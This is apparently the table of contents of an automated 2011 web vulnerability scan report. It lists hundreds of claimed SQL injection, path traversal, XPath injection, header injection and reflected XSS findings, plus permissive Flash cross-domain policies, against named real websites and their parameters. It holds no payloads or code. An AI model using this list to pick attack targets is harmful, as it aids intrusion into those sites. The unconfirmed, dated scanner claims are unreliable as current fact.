XSS, SQL Injection, HTTP Header Injection, DORK Report for April 2, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 09:55:17 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]

1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]

2. File path traversal

2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]

3. XPath injection

3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]

4. HTTP PUT enabled

5. HTTP header injection

5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]

5.3. http://www.health.com/favicon.ico [REST URL parameter 1]

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]

5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://fls.doubleclick.net/crossdomain.xml

7.3. http://s0.2mdn.net/crossdomain.xml

7.4. http://smp.adviva.net/crossdomain.xml

7.5. http://www.43things.com/crossdomain.xml

7.6. http://www.about.com/crossdomain.xml

7.7. http://www.accesshollywood.com/crossdomain.xml

7.8. http://www.accuweather.com/crossdomain.xml

7.9. http://www.addictinggames.com/crossdomain.xml

7.10. http://www.adriver.ru/crossdomain.xml

7.11. http://www.ajc.com/crossdomain.xml

7.12. http://www.allvoices.com/crossdomain.xml

7.13. http://www.ally.com/crossdomain.xml

7.14. http://www.ancestry.com/crossdomain.xml

7.15. http://www.answerstv.com/crossdomain.xml

7.16. http://www.apartmenthomeliving.com/crossdomain.xml

7.17. http://www.apartments.com/crossdomain.xml

7.18. http://www.archive.org/crossdomain.xml

7.19. http://www.askmen.com/crossdomain.xml

7.20. http://www.atom.com/crossdomain.xml

7.21. http://www.babelgum.com/crossdomain.xml

7.22. http://www.biblegateway.com/crossdomain.xml

7.23. http://www.bigpoint.com/crossdomain.xml

7.24. http://www.bizjournals.com/crossdomain.xml

7.25. http://www.blackberry.com/crossdomain.xml

7.26. http://www.blogs.com/crossdomain.xml

7.27. http://www.bloomberg.com/crossdomain.xml

7.28. http://www.boostmobile.com/crossdomain.xml

7.29. http://www.bravotv.com/crossdomain.xml

7.30. http://www.break.com/crossdomain.xml

7.31. http://www.buzznet.com/crossdomain.xml

7.32. http://www.cafemom.com/crossdomain.xml

7.33. http://www.cbs.com/crossdomain.xml

7.34. http://www.cbsinteractive.com/crossdomain.xml

7.35. http://www.cbssports.com/crossdomain.xml

7.36. http://www.clear-request.com/crossdomain.xml

7.37. http://www.cmt.com/crossdomain.xml

7.38. http://www.colbertnation.com/crossdomain.xml

7.39. http://www.collegehumor.com/crossdomain.xml

7.40. http://www.comedycentral.com/crossdomain.xml

7.41. http://www.contactatonce.com/crossdomain.xml

7.42. http://www.cracked.com/crossdomain.xml

7.43. http://www.crackle.com/crossdomain.xml

7.44. http://www.craveonline.com/crossdomain.xml

7.45. http://www.curse.com/crossdomain.xml

7.46. http://www.daylife.com/crossdomain.xml

7.47. http://www.degrees.info/crossdomain.xml

7.48. http://www.docstoc.com/crossdomain.xml

7.49. http://www.doctoroz.com/crossdomain.xml

7.50. http://www.ebaumsworld.com/crossdomain.xml

7.51. http://www.education.com/crossdomain.xml

7.52. http://www.ehow.co.uk/crossdomain.xml

7.53. http://www.eventful.com/crossdomain.xml

7.54. http://www.everydayhealth.com/crossdomain.xml

7.55. http://www.evtv1.com/crossdomain.xml

7.56. http://www.ew.com/crossdomain.xml

7.57. http://www.ez-tracks.com/crossdomain.xml

7.58. http://www.flixster.com/crossdomain.xml

7.59. http://www.freeonlinegames.com/crossdomain.xml

7.60. http://www.g4tv.com/crossdomain.xml

7.61. http://www.gamerdna.com/crossdomain.xml

7.62. http://www.gamesradar.com/crossdomain.xml

7.63. http://www.gametrailers.com/crossdomain.xml

7.64. http://www.gourmandia.com/crossdomain.xml

7.65. http://www.greenwichmeantime.com/crossdomain.xml

7.66. http://www.groupon.com/crossdomain.xml

7.67. http://www.health.com/crossdomain.xml

7.68. http://www.hiconversion.com/crossdomain.xml

7.69. http://www.hodesiq.com/crossdomain.xml

7.70. http://www.hollywoodreporter.com/crossdomain.xml

7.71. http://www.howstuffworks.com/crossdomain.xml

7.72. http://www.huffingtonpost.com/crossdomain.xml

7.73. http://www.imagebam.com/crossdomain.xml

7.74. http://www.imageshack.us/crossdomain.xml

7.75. http://www.ingdirect.com/crossdomain.xml

7.76. http://www.instructables.com/crossdomain.xml

7.77. http://www.instyle.com/crossdomain.xml

7.78. http://www.intellicast.com/crossdomain.xml

7.79. http://www.kaboodle.com/crossdomain.xml

7.80. http://www.like.com/crossdomain.xml

7.81. http://www.liveleak.com/crossdomain.xml

7.82. http://www.manualsonline.com/crossdomain.xml

7.83. http://www.mapquest.com/crossdomain.xml

7.84. http://www.marthastewart.com/crossdomain.xml

7.85. http://www.mate1.net/crossdomain.xml

7.86. http://www.menshealth.com/crossdomain.xml

7.87. http://www.metacafe.com/crossdomain.xml

7.88. http://www.metrolyrics.com/crossdomain.xml

7.89. http://www.minorleaguebaseball.com/crossdomain.xml

7.90. http://www.mlb.com/crossdomain.xml

7.91. http://www.mmo-champion.com/crossdomain.xml

7.92. http://www.mtv.com/crossdomain.xml

7.93. http://www.myrecipes.com/crossdomain.xml

7.94. http://www.ncm.com/crossdomain.xml

7.95. http://www.newser.com/crossdomain.xml

7.96. http://www.newsok.com/crossdomain.xml

7.97. http://www.nickjr.com/crossdomain.xml

7.98. http://www.nola.com/crossdomain.xml

7.99. http://www.nydailynews.com/crossdomain.xml

7.100. http://www.oodle.com/crossdomain.xml

7.101. http://www.openforum.com/crossdomain.xml

7.102. http://www.opportunity.co/crossdomain.xml

7.103. http://www.outdoorchannel.com/crossdomain.xml

7.104. http://www.pcworld.com/crossdomain.xml

7.105. http://www.people.com/crossdomain.xml

7.106. http://www.peoplestylewatch.com/crossdomain.xml

7.107. http://www.pittsburghlive.com/crossdomain.xml

7.108. http://www.playfin.com/crossdomain.xml

7.109. http://www.pokerstars.com/crossdomain.xml

7.110. http://www.popularscreensavers.com/crossdomain.xml

7.111. http://www.rawtube.com/crossdomain.xml

7.112. http://www.realsimple.com/crossdomain.xml

7.113. http://www.redorbit.com/crossdomain.xml

7.114. http://www.scout.com/crossdomain.xml

7.115. http://www.sendspace.com/crossdomain.xml

7.116. http://www.sfgate.com/crossdomain.xml

7.117. http://www.sheknows.com/crossdomain.xml

7.118. http://www.shockwave.com/crossdomain.xml

7.119. http://www.slideshare.net/crossdomain.xml

7.120. http://www.spike.com/crossdomain.xml

7.121. http://www.sportsnetwork.com/crossdomain.xml

7.122. http://www.swagbucks.com/crossdomain.xml

7.123. http://www.syfy.com/crossdomain.xml

7.124. http://www.tampabay.com/crossdomain.xml

7.125. http://www.tastebook.com/crossdomain.xml

7.126. http://www.teennick.com/crossdomain.xml

7.127. http://www.terra.com/crossdomain.xml

7.128. http://www.thedailybeast.com/crossdomain.xml

7.129. http://www.thedailyshow.com/crossdomain.xml

7.130. http://www.theonion.com/crossdomain.xml

7.131. http://www.thisoldhouse.com/crossdomain.xml

7.132. http://www.time.com/crossdomain.xml

7.133. http://www.totalbeauty.com/crossdomain.xml

7.134. http://www.travelpod.com/crossdomain.xml

7.135. http://www.urbanspoon.com/crossdomain.xml

7.136. http://www.ustream.tv/crossdomain.xml

7.137. http://www.vh1.com/crossdomain.xml

7.138. http://www.videosurf.com/crossdomain.xml

7.139. http://www.weather.gov/crossdomain.xml

7.140. http://www.weatherbug.com/crossdomain.xml

7.141. http://www.webkinz.com/crossdomain.xml

7.142. http://www.webmd.com/crossdomain.xml

7.143. http://www.wix.com/crossdomain.xml

7.144. http://www.wowhead.com/crossdomain.xml

7.145. http://www.wunderground.com/crossdomain.xml

7.146. http://www.xanga.com/crossdomain.xml

7.147. http://www.yardbarker.com/crossdomain.xml

7.148. http://www.yfrog.com/crossdomain.xml

7.149. http://www.younghollywood.com/crossdomain.xml

7.150. http://www.yourfilehost.com/crossdomain.xml

7.151. http://www.zillow.com/crossdomain.xml

7.152. http://www.zoosnet.net/crossdomain.xml

7.153. http://www.zvents.com/crossdomain.xml

7.154. http://googleads.g.doubleclick.net/crossdomain.xml

7.155. http://pagead2.googlesyndication.com/crossdomain.xml

7.156. http://www.123greetings.com/crossdomain.xml

7.157. http://www.4shared.com/crossdomain.xml

7.158. http://www.4tubemate.com/crossdomain.xml

7.159. http://www.6pm.com/crossdomain.xml

7.160. http://www.acehardware.com/crossdomain.xml

7.161. http://www.adobe.com/crossdomain.xml

7.162. http://www.ae.com/crossdomain.xml

7.163. http://www.aeropostale.com/crossdomain.xml

7.164. http://www.allbusiness.com/crossdomain.xml

7.165. http://www.allposters.com/crossdomain.xml

7.166. http://www.allrecipes.com/crossdomain.xml

7.167. http://www.altavista.com/crossdomain.xml

7.168. http://www.amazon.co.uk/crossdomain.xml

7.169. http://www.americangreetings.com/crossdomain.xml

7.170. http://www.aolnews.com/crossdomain.xml

7.171. http://www.apple.com/crossdomain.xml

7.172. http://www.associatedcontent.com/crossdomain.xml

7.173. http://www.astrology.com/crossdomain.xml

7.174. http://www.att.com/crossdomain.xml

7.175. http://www.azcentral.com/crossdomain.xml

7.176. http://www.babiesrus.com/crossdomain.xml

7.177. http://www.babycenter.com/crossdomain.xml

7.178. http://www.barackobama.com/crossdomain.xml

7.179. http://www.barbie.com/crossdomain.xml

7.180. http://www.barnesandnoble.com/crossdomain.xml

7.181. http://www.bathandbodyworks.com/crossdomain.xml

7.182. http://www.bbc.co.uk/crossdomain.xml

7.183. http://www.bettycrocker.com/crossdomain.xml

7.184. http://www.blastro.com/crossdomain.xml

7.185. http://www.blogtv.com/crossdomain.xml

7.186. http://www.bluemountain.com/crossdomain.xml

7.187. http://www.bnet.com/crossdomain.xml

7.188. http://www.bodybuilding.com/crossdomain.xml

7.189. http://www.britannica.com/crossdomain.xml

7.190. http://www.businessweek.com/crossdomain.xml

7.191. http://www.buy.com/crossdomain.xml

7.192. http://www.cabelas.com/crossdomain.xml

7.193. http://www.canada.com/crossdomain.xml

7.194. http://www.candystand.com/crossdomain.xml

7.195. http://www.caranddriver.com/crossdomain.xml

7.196. http://www.careerbuilder.com/crossdomain.xml

7.197. http://www.careerrookie.com/crossdomain.xml

7.198. http://www.carnival.com/crossdomain.xml

7.199. http://www.cars.com/crossdomain.xml

7.200. http://www.cartoonnetwork.com/crossdomain.xml

7.201. http://www.casttv.com/crossdomain.xml

7.202. http://www.cbc.ca/crossdomain.xml

7.203. http://www.cbsnews.com/crossdomain.xml

7.204. http://www.chacha.com/crossdomain.xml

7.205. http://www.charlotteobserver.com/crossdomain.xml

7.206. http://www.chemistry.com/crossdomain.xml

7.207. http://www.chevrolet.com/crossdomain.xml

7.208. http://www.chicagotribune.com/crossdomain.xml

7.209. http://www.chow.com/crossdomain.xml

7.210. http://www.chron.com/crossdomain.xml

7.211. http://www.cisco.com/crossdomain.xml

7.212. http://www.classmates.com/crossdomain.xml

7.213. http://www.clocklink.com/crossdomain.xml

7.214. http://www.clubpenguin.com/crossdomain.xml

7.215. http://www.cnbc.com/crossdomain.xml

7.216. http://www.cnet.com/crossdomain.xml

7.217. http://www.cnn.com/crossdomain.xml

7.218. http://www.cobaltnitra.com/crossdomain.xml

7.219. http://www.collegeboard.com/crossdomain.xml

7.220. http://www.comcast.net/crossdomain.xml

7.221. http://www.consumerreports.org/crossdomain.xml

7.222. http://www.consumersearch.com/crossdomain.xml

7.223. http://www.costco.com/crossdomain.xml

7.224. http://www.dailyfinance.com/crossdomain.xml

7.225. http://www.dailykos.com/crossdomain.xml

7.226. http://www.dailymotion.com/crossdomain.xml

7.227. http://www.dallascowboys.com/crossdomain.xml

7.228. http://www.dallasnews.com/crossdomain.xml

7.229. http://www.datpiff.com/crossdomain.xml

7.230. http://www.dell.com/crossdomain.xml

7.231. http://www.demdex.net/crossdomain.xml

7.232. http://www.dickssportinggoods.com/crossdomain.xml

7.233. http://www.directv.com/crossdomain.xml

7.234. http://www.discovery.com/crossdomain.xml

7.235. http://www.diynetwork.com/crossdomain.xml

7.236. http://www.dslreports.com/crossdomain.xml

7.237. http://www.dt00.net/crossdomain.xml

7.238. http://www.ebay.ca/crossdomain.xml

7.239. http://www.economist.com/crossdomain.xml

7.240. http://www.edmunds.com/crossdomain.xml

7.241. http://www.eharmony.com/crossdomain.xml

7.242. http://www.elle.com/crossdomain.xml

7.243. http://www.emedtv.com/crossdomain.xml

7.244. http://www.engadget.com/crossdomain.xml

7.245. http://www.entertonement.com/crossdomain.xml

7.246. http://www.eonline.com/crossdomain.xml

7.247. http://www.epa.gov/crossdomain.xml

7.248. http://www.etsy.com/crossdomain.xml

7.249. http://www.evite.com/crossdomain.xml

7.250. http://www.expedia.com/crossdomain.xml

7.251. http://www.factmonster.com/crossdomain.xml

7.252. http://www.familyeducation.com/crossdomain.xml

7.253. http://www.famousfootwear.com/crossdomain.xml

7.254. http://www.fandango.com/crossdomain.xml

7.255. http://www.fanfiction.net/crossdomain.xml

7.256. http://www.fanpop.com/crossdomain.xml

7.257. http://www.fantage.com/crossdomain.xml

7.258. http://www.fastcompany.com/crossdomain.xml

7.259. http://www.fedex.com/crossdomain.xml

7.260. http://www.fidelity.com/crossdomain.xml

7.261. http://www.finishline.com/crossdomain.xml

7.262. http://www.food.com/crossdomain.xml

7.263. http://www.foodnetwork.com/crossdomain.xml

7.264. http://www.forbes.com/crossdomain.xml

7.265. http://www.freelotto.com/crossdomain.xml

7.266. http://www.ft.com/crossdomain.xml

7.267. http://www.ftd.com/crossdomain.xml

7.268. http://www.funbrain.com/crossdomain.xml

7.269. http://www.funnyordie.com/crossdomain.xml

7.270. http://www.gaiaonline.com/crossdomain.xml

7.271. http://www.gamespot.com/crossdomain.xml

7.272. http://www.gamestop.com/crossdomain.xml

7.273. http://www.gamevance.com/crossdomain.xml

7.274. http://www.gap.com/crossdomain.xml

7.275. http://www.gather.com/crossdomain.xml

7.276. http://www.geico.com/crossdomain.xml

7.277. http://www.gifts.com/crossdomain.xml

7.278. http://www.godaddy.com/crossdomain.xml

7.279. http://www.goodreads.com/crossdomain.xml

7.280. http://www.guardian.co.uk/crossdomain.xml

7.281. http://www.hallmark.com/crossdomain.xml

7.282. http://www.hbo.com/crossdomain.xml

7.283. http://www.healthcentral.com/crossdomain.xml

7.284. http://www.hgtv.com/crossdomain.xml

7.285. http://www.hhs.gov/crossdomain.xml

7.286. http://www.hi5.com/crossdomain.xml

7.287. http://www.history.com/crossdomain.xml

7.288. http://www.hollywood.com/crossdomain.xml

7.289. http://www.hollywoodlife.com/crossdomain.xml

7.290. http://www.homedepot.com/crossdomain.xml

7.291. http://www.hp.com/crossdomain.xml

7.292. http://www.hsn.com/crossdomain.xml

7.293. http://www.hulu.com/crossdomain.xml

7.294. http://www.ichotelsgroup.com/crossdomain.xml

7.295. http://www.ikea.com/crossdomain.xml

7.296. http://www.ilike.com/crossdomain.xml

7.297. http://www.imdb.com/crossdomain.xml

7.298. http://www.indiatimes.com/crossdomain.xml

7.299. http://www.infoplease.com/crossdomain.xml

7.300. http://www.intel.com/crossdomain.xml

7.301. http://www.intuit.com/crossdomain.xml

7.302. http://www.ioffer.com/crossdomain.xml

7.303. http://www.istockphoto.com/crossdomain.xml

7.304. http://www.itt-tech.edu/crossdomain.xml

7.305. http://www.iwin.com/crossdomain.xml

7.306. http://www.jtv.com/crossdomain.xml

7.307. http://www.justin.tv/crossdomain.xml

7.308. http://www.kaboose.com/crossdomain.xml

7.309. http://www.kbb.com/crossdomain.xml

7.310. http://www.kenexa.com/crossdomain.xml

7.311. http://www.king.com/crossdomain.xml

7.312. http://www.kmart.com/crossdomain.xml

7.313. http://www.kodakgallery.com/crossdomain.xml

7.314. http://www.kraftrecipes.com/crossdomain.xml

7.315. http://www.krillion.com/crossdomain.xml

7.316. http://www.last.fm/crossdomain.xml

7.317. http://www.latimes.com/crossdomain.xml

7.318. http://www.legacy.com/crossdomain.xml

7.319. http://www.lego.com/crossdomain.xml

7.320. http://www.livecams.com/crossdomain.xml

7.321. http://www.livenation.com/crossdomain.xml

7.322. http://www.llbean.com/crossdomain.xml

7.323. http://www.macys.com/crossdomain.xml

7.324. http://www.mail.com/crossdomain.xml

7.325. http://www.marykay.com/crossdomain.xml

7.326. http://www.mastercard.com/crossdomain.xml

7.327. http://www.match.com/crossdomain.xml

7.328. http://www.mcafee.com/crossdomain.xml

7.329. http://www.medcohealth.com/crossdomain.xml

7.330. http://www.medscape.com/crossdomain.xml

7.331. http://www.meebo.com/crossdomain.xml

7.332. http://www.meetlocals.com/crossdomain.xml

7.333. http://www.meetup.com/crossdomain.xml

7.334. http://www.megaupload.com/crossdomain.xml

7.335. http://www.megavideo.com/crossdomain.xml

7.336. http://www.merck.com/crossdomain.xml

7.337. http://www.merriam-webster.com/crossdomain.xml

7.338. http://www.military.com/crossdomain.xml

7.339. http://www.mindjolt.com/crossdomain.xml

7.340. http://www.miniclip.com/crossdomain.xml

7.341. http://www.miracleworkers.com/crossdomain.xml

7.342. http://www.mocospace.com/crossdomain.xml

7.343. http://www.modelmayhem.com/crossdomain.xml

7.344. http://www.moshimonsters.com/crossdomain.xml

7.345. http://www.moviesunlimited.com/crossdomain.xml

7.346. http://www.msnbc.com/crossdomain.xml

7.347. http://www.mybloglog.com/crossdomain.xml

7.348. http://www.mycokerewards.com/crossdomain.xml

7.349. http://www.myheritage.com/crossdomain.xml

7.350. http://www.mylifetime.com/crossdomain.xml

7.351. http://www.myspace.com/crossdomain.xml

7.352. http://www.myxer.com/crossdomain.xml

7.353. http://www.myyearbook.com/crossdomain.xml

7.354. http://www.nascar.com/crossdomain.xml

7.355. http://www.nationalgeographic.com/crossdomain.xml

7.356. http://www.nba.com/crossdomain.xml

7.357. http://www.nbc.com/crossdomain.xml

7.358. http://www.nbcnewyork.com/crossdomain.xml

7.359. http://www.netflix.com/crossdomain.xml

7.360. http://www.newegg.com/crossdomain.xml

7.361. http://www.newport-news.com/crossdomain.xml

7.362. http://www.newsvine.com/crossdomain.xml

7.363. http://www.newsweek.com/crossdomain.xml

7.364. http://www.nfl.com/crossdomain.xml

7.365. http://www.nhl.com/crossdomain.xml

7.366. http://www.nike.com/crossdomain.xml

7.367. http://www.npr.org/crossdomain.xml

7.368. http://www.nwsource.com/crossdomain.xml

7.369. http://www.nypost.com/crossdomain.xml

7.370. http://www.nytimes.com/crossdomain.xml

7.371. http://www.opentable.com/crossdomain.xml

7.372. http://www.opera.com/crossdomain.xml

7.373. http://www.opinionshere.com/crossdomain.xml

7.374. http://www.oprah.com/crossdomain.xml

7.375. http://www.oracle.com/crossdomain.xml

7.376. http://www.ourstage.com/crossdomain.xml

7.377. http://www.overstock.com/crossdomain.xml

7.378. http://www.pandora.com/crossdomain.xml

7.379. http://www.parentsconnect.com/crossdomain.xml

7.380. http://www.partypoker.com/crossdomain.xml

7.381. http://www.paypal.com/crossdomain.xml

7.382. http://www.pbs.org/crossdomain.xml

7.383. http://www.pch.com/crossdomain.xml

7.384. http://www.pchlotto.com/crossdomain.xml

7.385. http://www.petfinder.com/crossdomain.xml

7.386. http://www.petside.com/crossdomain.xml

7.387. http://www.petsmart.com/crossdomain.xml

7.388. http://www.pga.com/crossdomain.xml

7.389. http://www.pgatour.com/crossdomain.xml

7.390. http://www.philly.com/crossdomain.xml

7.391. http://www.picnik.com/crossdomain.xml

